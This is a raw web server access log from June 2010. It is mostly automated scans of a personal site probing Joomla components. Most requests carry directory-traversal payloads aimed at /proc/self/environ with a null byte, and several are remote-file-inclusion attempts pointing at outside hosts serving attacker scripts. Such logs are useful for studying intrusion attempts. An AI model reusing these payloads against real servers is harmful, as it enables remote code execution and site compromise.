95.156.233.139 - - [21/Jun/2010:10:44:38 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:10:44:38 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:10:44:38 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:10:44:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:10:44:42 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:10:44:42 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
207.46.195.232 - - [21/Jun/2010:10:54:40 -0500] "GET /logs/access_log.1252454400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.76.12.197 - - [21/Jun/2010:10:57:10 -0500] "GET /logs/access_log.1274832000/?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:10:57:10 -0500] "GET /?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:10:57:10 -0500] "GET /logs/?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:10:59:47 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.121.216.99 - - [21/Jun/2010:10:59:47 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.200.244.57 - - [21/Jun/2010:10:59:49 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:11:04:24 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:11:04:24 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:11:04:24 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
208.113.133.112 - - [21/Jun/2010:11:05:39 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
208.113.133.112 - - [21/Jun/2010:11:05:39 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
216.104.40.250 - - [21/Jun/2010:11:05:39 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:05:39 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:05:39 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
208.113.133.112 - - [21/Jun/2010:11:05:39 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
174.121.216.99 - - [21/Jun/2010:11:07:04 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:11:07:05 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:11:07:05 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.191.229.96 - - [21/Jun/2010:11:09:10 -0500] "GET /logs/access_log.1274832000/?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
207.191.229.96 - - [21/Jun/2010:11:09:10 -0500] "GET /?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
207.191.229.96 - - [21/Jun/2010:11:09:10 -0500] "GET /logs/?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.831"
216.127.70.140 - - [21/Jun/2010:11:10:01 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:10:38 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.228.85.91 - - [21/Jun/2010:11:12:14 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.104.40.250 - - [21/Jun/2010:11:12:25 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
209.200.244.57 - - [21/Jun/2010:11:12:28 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.104.40.250 - - [21/Jun/2010:11:12:31 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.121.67.233 - - [21/Jun/2010:11:12:34 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:11:12:40 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.228.85.91 - - [21/Jun/2010:11:12:41 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
174.121.216.99 - - [21/Jun/2010:11:12:45 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
203.115.131.17 - - [21/Jun/2010:11:13:55 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 10351 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:13:56 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 10351 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:13:56 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:13:56 -0500] "GET /logs/access_log.1274572800////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:13:56 -0500] "GET /logs/access_log.1274572800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:13:56 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:13:57 -0500] "GET /logs/access_log.1274572800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:13:57 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 10351 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:13:57 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:14:00 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 10351 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:14:01 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
203.115.131.17 - - [21/Jun/2010:11:14:01 -0500] "GET /logs/access_log.1274572800////?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.104.40.250 - - [21/Jun/2010:11:15:02 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:15:02 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:15:02 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:15:06 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:15:06 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:15:07 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
87.106.28.150 - - [21/Jun/2010:11:15:07 -0500] "GET //index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.106.28.150 - - [21/Jun/2010:11:15:07 -0500] "GET /logs//index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.106.28.150 - - [21/Jun/2010:11:15:07 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.104.40.250 - - [21/Jun/2010:11:15:09 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:15:09 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:15:09 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
209.200.244.57 - - [21/Jun/2010:11:15:11 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:11:15:11 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:11:15:11 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
216.104.40.250 - - [21/Jun/2010:11:15:39 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:15:39 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.104.40.250 - - [21/Jun/2010:11:15:39 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
174.121.67.233 - - [21/Jun/2010:11:16:08 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.67.233 - - [21/Jun/2010:11:16:08 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.67.233 - - [21/Jun/2010:11:16:08 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:11:16:14 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:11:16:14 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:11:16:14 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:11:16:26 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:11:16:26 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:11:16:26 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.228.85.91 - - [21/Jun/2010:11:16:57 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:11:16:57 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:11:16:57 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
125.162.50.236 - - [21/Jun/2010:11:19:56 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.facebook.com/pages/Kostum/109407852410242?v=stream&ref=ts""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
125.162.50.236 - - [21/Jun/2010:11:19:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
125.162.50.236 - - [21/Jun/2010:11:20:00 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
125.162.50.236 - - [21/Jun/2010:11:20:00 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
125.162.50.236 - - [21/Jun/2010:11:20:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
125.162.50.236 - - [21/Jun/2010:11:20:00 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
125.162.50.236 - - [21/Jun/2010:11:20:04 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
216.127.70.140 - - [21/Jun/2010:11:21:50 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.124.198.60 - - [21/Jun/2010:11:22:09 -0500] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:11:22:09 -0500] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.833"
216.127.70.140 - - [21/Jun/2010:11:31:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:31:27 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:31:27 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
74.124.198.60 - - [21/Jun/2010:11:37:36 -0500] "GET /logs/access_log.1274572800/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:11:37:36 -0500] "GET /logs/access_log.1274572800/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:11:37:36 -0500] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:11:37:36 -0500] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:11:37:36 -0500] "GET /logs/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:11:37:36 -0500] "GET /logs/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.833"
64.156.24.220 - - [21/Jun/2010:11:38:31 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:38:31 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:39:35 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.129.119.43 - - [21/Jun/2010:11:40:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.215.0.123 - - [21/Jun/2010:11:41:08 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
95.215.0.123 - - [21/Jun/2010:11:41:08 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
95.215.0.123 - - [21/Jun/2010:11:41:08 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
203.172.211.204 - - [21/Jun/2010:11:41:46 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
95.215.0.123 - - [21/Jun/2010:11:42:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.127.70.140 - - [21/Jun/2010:11:43:01 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.218.116.165 - - [21/Jun/2010:11:43:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
203.172.211.204 - - [21/Jun/2010:11:44:02 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
203.172.211.204 - - [21/Jun/2010:11:44:03 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
203.172.211.204 - - [21/Jun/2010:11:44:05 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:44:25 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:44:25 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:44:33 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:44:44 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:45:33 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
203.172.211.204 - - [21/Jun/2010:11:46:00 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:46:09 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.124.198.60 - - [21/Jun/2010:11:46:41 -0500] "GET /logs/access_log.1274313600/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.833"
74.124.198.60 - - [21/Jun/2010:11:46:42 -0500] "GET /logs/access_log.1274313600/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.833"
216.127.70.140 - - [21/Jun/2010:11:47:05 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:05 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:05 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:08 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:09 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:09 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:13 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:14 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:14 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:19 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:19 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
